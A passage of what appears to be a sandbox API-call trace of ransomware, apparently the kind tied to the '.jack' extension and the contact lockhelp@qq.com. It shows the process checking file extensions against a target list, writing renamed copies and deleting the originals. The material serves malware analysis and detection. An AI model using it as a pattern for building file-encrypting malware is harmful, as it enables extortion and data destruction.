lpBuffer=0x3ce8020, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0) Thread: id = 17 os_tid = 0xd6c [0195.652] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x23aa0f0 [0195.653] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x23ba0f8 [0195.653] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378878 [0195.653] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x65a8d0 [0195.653] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378890 [0195.653] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x3dff020 [0195.656] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x23788a8 [0195.656] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x23788a8, Size=0x20) returned 0x236bcd8 [0195.656] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2378998 [0195.656] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2378998, Size=0x20) returned 0x236b850 [0195.657] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0195.657] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0195.657] Wow64DisableWow64FsRedirection (in: OldValue=0x32dff50 | out: OldValue=0x32dff50*=0x0) returned 1 [0195.657] lstrlenW (lpString="kernel32.dll") returned 12 [0195.657] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236bcd8 | out: hHeap=0x5e0000) returned 1 [0195.657] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0195.707] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b850 | out: hHeap=0x5e0000) returned 1 [0195.707] Sleep (dwMilliseconds=0x64) [0195.919] lstrcmpiW (lpString1=".cmd", lpString2=".jack") returned -1 [0195.919] lstrlenW (lpString="preoobe.cmd") returned 11 [0195.925] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0196.435] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=74) returned 1 [0196.435] CloseHandle (hObject=0x3f4) returned 1 [0196.435] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 0x20 [0196.435] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.435] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0196.436] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.436] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.436] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0196.436] GetLastError () returned 0x0 [0196.436] ReadFile (in: hFile=0x3f4, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x4a, lpOverlapped=0x0) returned 1 [0196.448] WriteFile (in: hFile=0x3f8, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x50, lpOverlapped=0x0) returned 1 [0196.450] ReadFile (in: hFile=0x3f4, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.450] WriteFile (in: hFile=0x3f8, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xea, lpOverlapped=0x0) returned 1 [0196.450] SetEndOfFile (hFile=0x3f8) returned 1 [0196.450] CloseHandle (hObject=0x3f8) returned 1 [0196.467] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.467] SetEndOfFile (hFile=0x3f4) returned 1 [0196.468] CloseHandle (hObject=0x3f4) returned 1 [0196.468] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0196.468] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 1 [0196.469] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.469] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.469] lstrlenW (lpString=".doc") returned 4 [0196.469] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0196.469] lstrlenW (lpString=".docx") returned 5 [0196.469] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0196.469] lstrlenW (lpString=".pdf") returned 4 [0196.469] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0196.469] lstrlenW (lpString=".xls") returned 4 [0196.469] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0196.469] lstrlenW (lpString=".xlsx") returned 5 [0196.469] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0196.469] lstrlenW (lpString=".ppt") returned 4 [0196.469] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0196.469] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.469] lstrlenW (lpString=".zip") returned 4 [0196.469] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0196.469] lstrlenW (lpString=".rar") returned 4 [0196.469] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0196.469] lstrlenW (lpString=".bz2") returned 4 [0196.469] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0196.469] lstrlenW (lpString=".7z") returned 3 [0196.469] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0196.469] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.469] lstrlenW (lpString=".dbf") returned 4 [0196.469] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0196.469] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.469] lstrlenW (lpString=".1cd") returned 4 [0196.470] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0196.470] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.470] lstrlenW (lpString=".jpg") returned 4 [0196.470] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0196.470] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.470] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.470] lstrlenW (lpString=".doc") returned 4 [0196.470] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0196.470] lstrlenW (lpString=".docx") returned 5 [0196.470] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0196.470] lstrlenW (lpString=".pdf") returned 4 [0196.470] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0196.470] lstrlenW (lpString=".xls") returned 4 [0196.470] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0196.470] lstrlenW (lpString=".xlsx") returned 5 [0196.470] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0196.470] lstrlenW (lpString=".ppt") returned 4 [0196.470] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0196.470] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.470] lstrlenW (lpString=".zip") returned 4 [0196.470] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0196.470] lstrlenW (lpString=".rar") returned 4 [0196.470] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0196.470] lstrlenW (lpString=".bz2") returned 4 [0196.470] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0196.470] lstrlenW (lpString=".7z") returned 3 [0196.470] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0196.471] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.471] lstrlenW (lpString=".dbf") returned 4 [0196.471] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0196.471] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.471] lstrlenW (lpString=".1cd") returned 4 [0196.471] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0196.471] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0196.471] lstrlenW (lpString=".jpg") returned 4 [0196.471] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0196.471] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.471] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.471] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0196.760] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=17240) returned 1 [0196.760] CloseHandle (hObject=0x3f8) returned 1 [0196.760] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll")) returned 0x80 [0196.760] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.761] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0196.761] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.761] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.761] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0196.761] GetLastError () returned 0x0 [0196.761] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x4358, lpOverlapped=0x0) returned 1 [0196.763] WriteFile (in: hFile=0x3fc, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x4360, lpOverlapped=0x0) returned 1 [0196.764] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.764] WriteFile (in: hFile=0x3fc, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.765] SetEndOfFile (hFile=0x3fc) returned 1 [0196.765] CloseHandle (hObject=0x3fc) returned 1 [0196.772] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.773] SetEndOfFile (hFile=0x3f8) returned 1 [0196.774] CloseHandle (hObject=0x3f8) returned 1 [0196.774] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.774] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll")) returned 1 [0196.774] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.774] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.774] lstrlenW (lpString=".doc") returned 4 [0196.775] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.775] lstrlenW (lpString=".docx") returned 5 [0196.775] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.775] lstrlenW (lpString=".pdf") returned 4 [0196.775] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.775] lstrlenW (lpString=".xls") returned 4 [0196.775] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.775] lstrlenW (lpString=".xlsx") returned 5 [0196.775] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.775] lstrlenW (lpString=".ppt") returned 4 [0196.775] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.775] lstrlenW (lpString=".zip") returned 4 [0196.775] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.775] lstrlenW (lpString=".rar") returned 4 [0196.775] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.775] lstrlenW (lpString=".bz2") returned 4 [0196.775] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.775] lstrlenW (lpString=".7z") returned 3 [0196.775] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.775] lstrlenW (lpString=".dbf") returned 4 [0196.775] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.775] lstrlenW (lpString=".1cd") returned 4 [0196.775] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.775] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.775] lstrlenW (lpString=".jpg") returned 4 [0196.775] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.776] lstrlenW (lpString=".doc") returned 4 [0196.776] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.776] lstrlenW (lpString=".docx") returned 5 [0196.776] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.776] lstrlenW (lpString=".pdf") returned 4 [0196.776] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.776] lstrlenW (lpString=".xls") returned 4 [0196.776] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.776] lstrlenW (lpString=".xlsx") returned 5 [0196.776] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.776] lstrlenW (lpString=".ppt") returned 4 [0196.776] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.776] lstrlenW (lpString=".zip") returned 4 [0196.776] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.776] lstrlenW (lpString=".rar") returned 4 [0196.776] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.776] lstrlenW (lpString=".bz2") returned 4 [0196.776] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.776] lstrlenW (lpString=".7z") returned 3 [0196.776] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.776] lstrlenW (lpString=".dbf") returned 4 [0196.776] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.776] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.777] lstrlenW (lpString=".1cd") returned 4 [0196.777] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.777] lstrlenW (lpString="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 45 [0196.777] lstrlenW (lpString=".jpg") returned 4 [0196.777] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.777] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.777] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.777] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0196.777] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=17240) returned 1 [0196.777] CloseHandle (hObject=0x3f8) returned 1 [0196.777] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll")) returned 0x80 [0196.777] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0196.778] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0196.778] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.820] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.820] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0196.836] GetLastError () returned 0x0 [0196.836] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x4358, lpOverlapped=0x0) returned 1 [0196.838] WriteFile (in: hFile=0x408, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0x4360, lpOverlapped=0x0) returned 1 [0196.839] ReadFile (in: hFile=0x3f8, lpBuffer=0x3dff020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesRead=0x32dfecc*=0x0, lpOverlapped=0x0) returned 1 [0196.839] WriteFile (in: hFile=0x408, lpBuffer=0x3dff020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x32dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3dff020*, lpNumberOfBytesWritten=0x32dfc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.839] SetEndOfFile (hFile=0x408) returned 1 [0196.839] CloseHandle (hObject=0x408) returned 1 [0196.841] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32dfec0 | out: lpNewFilePointer=0x0) returned 1 [0196.842] SetEndOfFile (hFile=0x3f8) returned 1 [0196.843] CloseHandle (hObject=0x3f8) returned 1 [0196.843] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0196.843] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll")) returned 1 [0196.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.844] lstrlenW (lpString=".doc") returned 4 [0196.844] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString=".docx") returned 5 [0196.844] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.844] lstrlenW (lpString=".pdf") returned 4 [0196.844] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString=".xls") returned 4 [0196.844] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString=".xlsx") returned 5 [0196.844] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.844] lstrlenW (lpString=".ppt") returned 4 [0196.844] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.844] lstrlenW (lpString=".zip") returned 4 [0196.844] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString=".rar") returned 4 [0196.845] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString=".bz2") returned 4 [0196.845] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.845] lstrlenW (lpString=".7z") returned 3 [0196.845] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.845] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.845] lstrlenW (lpString=".dbf") returned 4 [0196.845] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.845] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.845] lstrlenW (lpString=".1cd") returned 4 [0196.845] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.845] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.845] lstrlenW (lpString=".jpg") returned 4 [0196.845] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.845] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.845] lstrlenW (lpString=".doc") returned 4 [0196.845] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString=".docx") returned 5 [0196.845] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.845] lstrlenW (lpString=".pdf") returned 4 [0196.845] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString=".xls") returned 4 [0196.845] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString=".xlsx") returned 5 [0196.846] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.846] lstrlenW (lpString=".ppt") returned 4 [0196.846] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.846] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.846] lstrlenW (lpString=".zip") returned 4 [0196.846] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.846] lstrlenW (lpString=".rar") returned 4 [0196.846] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.846] lstrlenW (lpString=".bz2") returned 4 [0196.846] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.846] lstrlenW (lpString=".7z") returned 3 [0196.846] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.846] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.846] lstrlenW (lpString=".dbf") returned 4 [0196.846] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.846] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.846] lstrlenW (lpString=".1cd") returned 4 [0196.846] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.846] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 45 [0196.846] lstrlenW (lpString=".jpg") returned 4 [0196.846] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.847] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0196.847] lstrlenW (lpString="SetupResources.dll") returned 18 [0196.847] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8 [0196.847] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0x32dff14 | out: lpFileSize=0x32dff14*=18776) returned 1 [0196.847] CloseHandle (hObject=0x3f8) returned 1 [0196.847] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1036\\setupresources.dll")) returned 0x80 [0196.847] GetFileAttributesW 